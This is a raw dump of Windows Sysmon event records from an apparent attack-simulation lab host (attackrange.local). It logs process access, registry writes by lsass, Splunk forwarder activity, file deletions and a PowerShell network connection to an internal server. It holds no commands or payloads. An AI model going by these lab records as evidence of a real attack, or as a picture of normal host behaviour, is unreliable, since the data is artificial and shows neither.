Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.910{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.910{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.910{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.910{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.910{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-83EA-613A-E996-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.910{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83EA-613A-E996-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.905{B81B27B7-83EA-613A-E996-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000035128867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 22:00:10.569{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000035128866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 22:00:10.569{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x72517ac4) 13241300x800000000000000035128865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 22:00:10.569{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a5bd-0xaced1a65) 13241300x800000000000000035128864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 22:00:10.569{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5c6-0x0eb18265) 13241300x800000000000000035128863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 22:00:10.569{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5ce-0x7075ea65) 13241300x800000000000000035128862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 22:00:10.569{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000035128861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 22:00:10.569{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x72517ac4) 13241300x800000000000000035128860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 22:00:10.569{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a5bd-0xaced1a65) 13241300x800000000000000035128859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 22:00:10.569{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5c6-0x0eb18265) 13241300x800000000000000035128858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 22:00:10.569{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5ce-0x7075ea65) 10341000x800000000000000035128857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.437{B81B27B7-83EA-613A-E896-03000000C801}40523948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035128856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:35.168{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62211-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.341{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AF27A5FCB7483E0B6CDA9DDFE957972,SHA256=CAEE0A24C0772FBC581E4F00A3D46498C2E2519FC6AB7B8B20AD67971FC58407,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.252{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83EA-613A-E896-03000000C801}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.237{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.237{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.237{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.237{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.237{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-83EA-613A-E896-03000000C801}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.237{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83EA-613A-E896-03000000C801}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.222{B81B27B7-83EA-613A-E896-03000000C801}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:11.360{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62A0A8E993D5DE9EEEDF479E7B34EA1C,SHA256=A7CDCA50A707BCF9B926A6CE428800EBF5E18543E3A098A0EEBB5D22F34DF12D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:11.258{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB47CAFCA9267AEEADC10FBA1C7B8D57,SHA256=4082DA2DBB40D2A39B955DF5FA3DA0DA7B90D1A62B9982F5E780440FD7ABD56E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:12.391{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93CFC515B37573F35EDA01BCE5B7AA76,SHA256=4218EF8AA9CECEDD91A6DA7B4DEA26D7E33B45A032FBB7D749DF516DDF891234,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:37.410{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62212-false10.0.1.12-8000- 23542300x800000000000000035128879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:13.408{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF1ED2CF5C990517AA607E7FAD4B1F41,SHA256=26A95F1D8DD3C316BD464A39E7C94FCC4AE52ADAB5BB8407D1E184440F4F0903,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.190{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62213-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:14.426{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=486F99DEC14E84BE36CC729FCAF66ABA,SHA256=DA8BDB6B116142760CD07CCC7C0283D330FB90940B5ACF14AD0080CD922B8099,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:14.142{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DF231DB3E37E832F621051481102C50A,SHA256=264548C4CC5379E6B82B9EE5E71A6BE9F667FAEFC84272372113C14903CFC4C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:15.440{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A094CB2739BC84B03354CEAA0FA781C6,SHA256=BE9527C4029879A0F19F2BA50E98C4064F5C6866BBAE3BC3546888D6C55BF43B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:16.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A93BD2F405CC2435AAC68AAE779F527,SHA256=F8B7D8B5480FBF0570C4B43AF6E3124407A54B937B766F9463F2C517A9C0C315,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:17.686{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A4543B5B1F6E94D5F0E717B13296CD,SHA256=CFC0C99653642F0B71420319D08323FC9D11CCE2329340F9A0E437B4EDDEFD0D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:18.689{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B66E861E62E91424425E20358DF3B4B,SHA256=68E8B78E3DE73F942F023536315DD91A6B95817FB53B24ECB62183FCCFF00326,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:19.742{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A2B9B536B077619616327B61DE40F7E,SHA256=C94A7828AB484BA3B01F344F61CC08D42CAACC9E08873AD81E033827B3373E8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:43.208{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 